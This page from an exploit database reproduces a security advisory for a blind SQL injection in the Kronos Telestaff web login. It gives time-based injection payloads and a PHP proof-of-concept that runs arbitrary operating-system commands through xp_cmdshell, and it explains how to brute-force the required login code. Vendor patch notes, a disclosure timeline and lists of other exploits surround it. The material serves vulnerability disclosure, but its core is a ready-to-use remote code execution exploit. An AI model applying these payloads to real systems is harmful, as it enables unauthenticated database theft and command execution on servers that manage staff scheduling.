Menu

Search for hundreds of thousands of exploits

"Kronos Telestaff < 2.92EU29 - SQL Injection"

Author

Exploit author

"Goran Tuzovic"

Platform

Exploit platform

asp

Release date

Exploit published date

2017-06-05

Download file

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
Software: Kronos Telestaff Web Application
Version: < 2.92EU29
Homepage: http://www.kronos.com/
CERT VU: VU#958480
CVE: (Pending)
CVSS: 10 (Low; AV:N/AC:L/Au:N/C:C/I:C/A:C)
CWE: CWE-89   
Vulnerable Component: Login page 

Description
================
The login form is vulnerable to blind SQL injection by an unauthenticated user.


Vulnerabilities
================
The vulnerability is due to the unsanitized POST parameter 'user' in login page:
URL: [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POSTDATA=device=stdbrowser&action=doLogin&user=&pwd=&code=

The exploit requires a valid "code" in the post body.  However in almost all instances we found on the internet, the "code" POST variable was hard-coded into the page.  Furthermore, the "code" POST variable is very often a 4 digit number - and can be easily discovered in ~5000 requests. 

 
Proof of concept
================
PoC 1 - extract data from database
example extract benign data e.g. 
Injection Point:  [BASE URL OF Telestaff Application]/servlet/ServletController.asp
POST data: 
device=stdbrowser&action=doLogin&user=')if(DB_NAME()='TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>

compare timing with

device=stdbrowser&action=doLogin&user=')if(DB_NAME()<>'TELESTAFF')waitfor%20delay'00%3a00%3a12';--&pwd=&code=<valid code>


PoC 2 - Execute Code Remotely
example inject benign code e.g. ping a remote systems

<?php
	$cmd_to_execute = strToHex("ping -n 1 receive_ping_host");  // insert you own host here to detect dns lookup and/or ping; or insert other command 
	$code=XXXX // insert valid code
	$target_url= // insert login page url of target system i.e. example.com/webstaff-2.0/servlet/ServletController.asp?device=stdbrowser&action=doLogin&selfhosted=true
	$payload="DECLARE @lphda VARCHAR(280);SET @lphda=".$cmd_to_execute.";EXEC master..xp_cmdshell @lphda";
	$payload=str_replace(" ","%20",$payload);
	$postdata="device=stdbrowser&action=doLogin&user=')".$payload."---&pwd=test&code=".$code;

	$ch = curl_init();
	curl_setopt($ch, CURLOPT_URL, $target_url);
	curl_setopt($ch, CURLOPT_POST, TRUE);
	curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
	curl_exec($ch);

	function strToHex($string){
	  $hex = '';
	  for ($i=0; $i<strlen($string); $i++){
		$ord = ord($string[$i]);
		$hexCode = dechex($ord);
		$hex .= substr('0'.$hexCode, -2);
	  }
	  return "0x".strToUpper($hex);
	}

	
Affected Systems
================
From Vendor:
Customers running TeleStaff version 2.x with Self Hosted Web Access, those customers who host their own web access, are affected and Kronos recommends that you upgrade to TeleStaff 2.92EU29 or Workforce TeleStaff.


Solution
================
From Vendor:

Though there is no further action needed after the installation of the update there are a couple of best practices that we suggest to further secure the production environment.
	1. We recommend that the Web Staff Middle Tier be locked down to only be accessed from the source addresses.  For Self-Hosted Web Access this would be the Internet facing IIS server hosting the Self Hosted WebStaff module. For customers using WebStaff (www.telestaff.net) and PSM (psm.telestaff.net and m.telestaff.net) those are the IP addresses of the Kronos servers.
	2. Customers, once configured, should remove the viewDatabases.asp script to avoid accidental information leakage to unauthorized users.

	
Timeline
================
2015-12-18: Discovered
2016-01-04: Contacted Vendor
2016-01-11: Report sent to vendor 
2016-01-20: Received acknowledgement of vulnerable from security contact info at vendor
2016-01-20: Vendor is remediating the issue 
2016-10-18: Vendor issues patch
2017-06-01: Public disclosure
 

Discovered by
================
Chris Anastasio 0x616e6173746173696f [ at ] illumant.com
Mark F. Snodgrass  0x736e6f646772617373 [ at ] illumant.com


About Illumant
================
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks.  Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant.  For more information, visit https://illumant.com/
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-07-10 "HelloWeb 2.0 - Arbitrary File Download" webapps asp bRpsd
2020-03-16 "Enhanced Multimedia Router 3.0.4.27 - Cross-Site Request Forgery (Add Admin)" webapps asp "Miguel Mendez Z"
2020-01-24 "OLK Web Store 2020 - Cross-Site Request Forgery" webapps asp "Joel Aviad Ossi"
2019-12-18 "Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting" webapps asp "Harshit Shukla"
2019-11-18 "Crystal Live HTTP Server 6.01 - Directory Traversal" webapps asp "numan türle"
2019-08-16 "Web Wiz Forums 12.01 - 'PF' SQL Injection" webapps asp n1x_
2019-05-06 "microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection" webapps asp "felipe andrian"
2019-02-12 "Skyworth GPON HomeGateways and Optical Network Terminals - Stack Overflow" dos asp "Kaustubh G. Padwad"
2018-11-05 "Advantech WebAccess SCADA 8.3.2 - Remote Code Execution" webapps asp "Chris Lyne"
2018-05-29 "IssueTrak 7.0 - SQL Injection" webapps asp "Chris Anastasio"
Release Date Title Type Platform Author
2017-06-05 "Kronos Telestaff < 2.92EU29 - SQL Injection" webapps asp "Goran Tuzovic"
2017-06-02 "Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection" webapps json "Goran Tuzovic"
2016-03-23 "MiCollab 7.0 - SQL Injection" webapps multiple "Goran Tuzovic" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected